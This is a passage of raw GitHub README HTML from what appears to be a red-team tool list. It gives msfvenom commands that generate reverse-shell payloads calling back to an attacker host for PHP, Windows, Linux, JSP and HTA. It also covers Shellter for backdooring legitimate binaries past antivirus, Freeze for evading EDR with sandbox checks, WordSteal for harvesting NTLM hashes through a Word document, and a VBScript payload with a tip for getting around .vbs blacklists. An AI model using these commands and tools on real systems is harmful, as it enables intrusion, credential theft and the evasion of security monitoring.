0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>PHP:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R"><pre>msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R</pre></div> <p dir="auto"><strong>Windows:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe"><pre>msfvenom -p windows/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f exe <span class="pl-k">></span> shell-x86.exe</pre></div> <p dir="auto"><strong>Linux:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf"><pre>msfvenom -p linux/x86/shell/reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f elf <span class="pl-k">></span> shell-x86.elf</pre></div> <p dir="auto"><strong>Java:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp"><pre>msfvenom -p java/jsp_shell_reverse_tcp LHOST=<span class="pl-k"><</span>IP<span class="pl-k">></span> LPORT=<span class="pl-k"><</span>PORT<span class="pl-k">></span> -f raw <span class="pl-k">></span> shell.jsp</pre></div> <p dir="auto"><strong>HTA:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta"><pre>msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh <span class="pl-k">></span> shell.hta</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png"><img src="https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.shellterproject.com/" rel="nofollow">Shellter</a></h3><a id="user-content-shellter" class="anchor" aria-label="Permalink: 🔙Shellter" href="#shellter"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.</p> <p dir="auto">It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).</p> <p dir="auto">Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.</p> <p dir="auto">Full README information can be found <a href="https://www.shellterproject.com/Downloads/Shellter/Readme.txt" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="apt-get update apt-get install shellter"><pre>apt-get update apt-get install shellter</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <p dir="auto">Visit the <a href="https://www.shellterproject.com/download/" rel="nofollow">download page</a> and install.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Just pick a legit binary to backdoor and run Shellter.</p> <p dir="auto">Some nice tips can be found <a href="https://www.shellterproject.com/tipstricks/" rel="nofollow">here</a>.</p> <p dir="auto">Lots of community usage demos can be found <a href="https://www.shellterproject.com/shellter-community-demos/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png"><img src="https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.kali.org/tools/shellter/images/shellter.png" rel="nofollow">https://www.kali.org/tools/shellter/images/shellter.png</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/Freeze">Freeze</a></h3><a id="user-content-freeze" class="anchor" aria-label="Permalink: 🔙Freeze" href="#freeze"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.</p> <p dir="auto">Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go"><pre>git clone https://github.com/optiv/Freeze <span class="pl-c1">cd</span> Freeze go build Freeze.go</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking)"><pre class="notranslate"><code> -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking) </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png"><img src="https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://www.blackhatethicalhacking.com/tools/freeze/" rel="nofollow">https://www.blackhatethicalhacking.com/tools/freeze/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/0x09AL/WordSteal">WordSteal</a></h3><a id="user-content-wordsteal" class="anchor" aria-label="Permalink: 🔙WordSteal" href="#wordsteal"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint.</p> <p dir="auto">Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/0x09AL/WordSteal cd WordSteal"><pre class="notranslate"><code>git clone https://github.com/0x09AL/WordSteal cd WordSteal </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Generate document containing 'test.jpg' and start listener ./main.py 127.0.0.1 test.jpg 1 # Generate document containing 'test.jpg' and do not start listener ./main.py 127.0.0.1 test.jpg 0\n"><pre><span class="pl-c"><span class="pl-c">#</span> Generate document containing 'test.jpg' and start listener</span> ./main.py 127.0.0.1 test.jpg 1 <span class="pl-c"><span class="pl-c">#</span> Generate document containing 'test.jpg' and do not start listener</span> ./main.py 127.0.0.1 test.jpg 0<span class="pl-cce">\n</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png"><img src="https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/" rel="nofollow">https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="http://undocumented.ntinternals.net/" rel="nofollow">NTAPI Undocumented Functions</a></h3><a id="user-content-ntapi-undocumented-functions" class="anchor" aria-label="Permalink: 🔙NTAPI Undocumented Functions" href="#ntapi-undocumented-functions"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.</p> <p dir="auto">It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.</p> <p dir="auto">When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="http://undocumented.ntinternals.net/" rel="nofollow">http://undocumented.ntinternals.net/</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE"><img src="https://private-user-images.githubusercontent.com/100603074/238468558-41b424f3-053c-440b-b0fd-235e95980d9a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NTU4LTQxYjQyNGYzLTA1M2MtNDQwYi1iMGZkLTIzNWU5NTk4MGQ5YS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZTYxYTllMzM4YjQ0YzFhMGQ4YWFiNDI4Zjk5MzVmNWE0NGYwYzIwZGVjZTc0NzQxNjEwNDMyNjM2NTIxYzlhJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.HDIb4rJn4kmn4hW2vKSlOm3SUxbcrQBmaXn9ic-uDBE" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="http://undocumented.ntinternals.net/" rel="nofollow">http://undocumented.ntinternals.net/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://codemachine.com/articles/kernel_callback_functions.html" rel="nofollow">Kernel Callback Functions</a></h3><a id="user-content-kernel-callback-functions" class="anchor" aria-label="Permalink: 🔙Kernel Callback Functions" href="#kernel-callback-functions"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances.</p> <p dir="auto">Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers.</p> <p dir="auto">The undocumented functions are described briefly whereas the documented ones are just listed here for reference.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://codemachine.com/articles/kernel_callback_functions.html" rel="nofollow">https://codemachine.com/articles/kernel_callback_functions.html</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA"><img src="https://private-user-images.githubusercontent.com/100603074/238468952-b7532b7d-1abc-4af6-be92-f6f78d24a788.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4OTUyLWI3NTMyYjdkLTFhYmMtNGFmNi1iZTkyLWY2Zjc4ZDI0YTc4OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MzAxMThiZmJiNThjODRlNjhhZjg0MGIxNTA1NjM2NzUwYjM5OWI3M2ExMWVjOTVhNGNmZWZiMjUyYWI5ODU1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.Tt9OQSD5FulZC8wa8jzvl6vNGV4xwPqdbJk50WUnNLA" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://codemachine.com" rel="nofollow">https://codemachine.com</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/S3cur3Th1sSh1t/OffensiveVBA">OffensiveVBA</a></h3><a id="user-content-offensivevba" class="anchor" aria-label="Permalink: 🔙OffensiveVBA" href="#offensivevba"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.</p> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Visit <a href="https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo">https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer" href="https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA"><img src="https://private-user-images.githubusercontent.com/100603074/238468760-7f7ad942-48d7-42e7-a3cc-55ec84139058.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY4NzYwLTdmN2FkOTQyLTQ4ZDctNDJlNy1hM2NjLTU1ZWM4NDEzOTA1OC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1iMTY4YjI3NzE5NTUxMmIxZjM1NzA4ODQ3NWJmZWY1Zjc3ZGJkYjlkYmM3ZjA4M2VjNThkZjEwMWNmYjU0YzE0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.a3c8B_beIWc5ltk0GN7Mcfmkgsbb2DJtWxEGwUvg1sA" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/S3cur3Th1sSh1t">https://github.com/S3cur3Th1sSh1t</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>WSH</h3><a id="user-content-wsh" class="anchor" aria-label="Permalink: 🔙WSH" href="#wsh"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Creating payload:</strong></p> <div class="highlight highlight-source-vbnet notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True"><pre><span class="pl-k">Set</span> <span class="pl-smi">shell</span> <span class="pl-smi">=</span> <span class="pl-smi">WScript.CreateObject(</span><span class="pl-s">"Wscript.Shell"</span><span class="pl-smi">)</span> <span class="pl-smi">shell.Run(</span><span class="pl-s">"C:\Windows\System32\calc.exe "</span> <span class="pl-smi">&</span> <span class="pl-smi">WScript.ScriptFullName),</span><span class="pl-s">0</span><span class="pl-smi">,</span><span class="pl-k">True</span></pre></div> <p dir="auto"><strong>Execute:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted"><pre>wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted</pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>HTA</h3><a id="user-content-hta" class="anchor" aria-label="Permalink: 🔙HTA" href="#hta"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 